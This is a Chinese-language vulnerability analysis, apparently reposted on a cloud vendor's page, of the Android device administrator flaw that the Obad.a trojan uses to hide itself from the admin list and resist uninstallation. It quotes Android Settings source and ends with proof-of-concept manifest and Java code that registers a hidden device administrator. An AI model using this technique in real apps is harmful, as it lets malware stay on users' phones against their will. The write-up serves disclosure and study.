標籤:des android style http color io os 使用 ar
一、漏洞描述
目前被稱為“史上最強Android木馬”的病毒Backdoor.AndroidOS.Obad.a利用Android裝置管理員漏洞使使用者無法通過正常方式卸載。其實該漏洞早在去年底已被發現。(http://safe.ijiami.cn/)
註冊為“裝置管理員”的應用是無法被直接卸載的。只有取消啟用“裝置管理員”後才可以直接卸載。
木馬可以利用Android裝置管理員漏洞達到在裝置管理員列表“隱藏”的效果。這樣使用者就無法進去“取消啟用”頁面,從而達到無法卸載的目的。
三、漏洞原理
首先我們來看一下Settings app如何形成裝置管理員列表的:
相關類:
packages\apps\settings\src\com\android\settings\DeviceAdminSettings.java
public class DeviceAdminSettings extends ListFragment {
DevicePolicyManager mDPM;
final HashSet<ComponentName> mActiveAdmins = new HashSet<ComponentName>();
final ArrayList<DeviceAdminInfo> mAvailableAdmins = new ArrayList<DeviceAdminInfo>();
@Override
public void onResume() {
super.onResume();
updateList();
}
void updateList() {
mActiveAdmins.clear();
List<ComponentName> cur = mDPM.getActiveAdmins();
if (cur != null) {
for (int i=0; i<cur.size(); i++) {
mActiveAdmins.add(cur.get(i));
}
}
mAvailableAdmins.clear();
List<ResolveInfo> avail = getActivity().getPackageManager().queryBroadcastReceivers(
new Intent(DeviceAdminReceiver.ACTION_DEVICE_ADMIN_ENABLED),
PackageManager.GET_META_DATA);//通過查詢廣播”android.app.action.DEVICE_ADMIN_ENABLED“來得到可用的設 //備管理器程式列表
int count = avail == null ? 0 : avail.size();
for (int i=0; i<count; i++) {
ResolveInfo ri = avail.get(i);
try {
DeviceAdminInfo dpi = new DeviceAdminInfo(getActivity(), ri);
if (dpi.isVisible() || mActiveAdmins.contains(dpi.getComponent())) {
mAvailableAdmins.add(dpi);
}
//如果應用已啟用裝置管理員&&註冊了”android.app.action.DEVICE_ADMIN_ENABLED“就出現在可用裝置管理員列表
} catch (XmlPullParserException e) {
Log.w(TAG, "Skipping " + ri.activityInfo, e);
} catch (IOException e) {
Log.w(TAG, "Skipping " + ri.activityInfo, e);
}
}
getListView().setAdapter(new PolicyListAdapter());
}
.......
class PolicyListAdapter extends BaseAdapter {
.......
public void bindView(View view, int position) {
final Activity activity = getActivity();
ViewHolder vh = (ViewHolder) view.getTag();
DeviceAdminInfo item = mAvailableAdmins.get(position);//顯示mAvailableAdmins中資料
vh.icon.setImageDrawable(item.loadIcon(activity.getPackageManager()));
vh.name.setText(item.loadLabel(activity.getPackageManager()));
vh.checkbox.setChecked(mActiveAdmins.contains(item.getComponent()));
try {
vh.description.setText(item.loadDescription(activity.getPackageManager()));
} catch (Resources.NotFoundException e) {
}
}
}
}
由Android Settings App原始碼可以看出,如果想在裝置管理員列表中”隱藏“,只要不註冊”android.app.action.DEVICE_ADMIN_ENABLED“廣播就行。
四、POC代碼
AndroidMainfest.xml檔案註冊組件:
<receiver Android:name=".deviceAdminReceiver" android:label="@string/app_name"
Android:description="@string/description" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data Android:name="android.app.device_admin"
Android:resource="@xml/device_admin" />
</receiver>
java代碼註冊啟用裝置管理員:
Intent intent = new Intent(
DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
ComponentName mDeviceComponentName = new ComponentName("packagename","packagename.deviceAdminReceiver");
intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,
mDeviceComponentName);
this.startActivity(intent,0);
Android裝置管理員漏洞分析!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
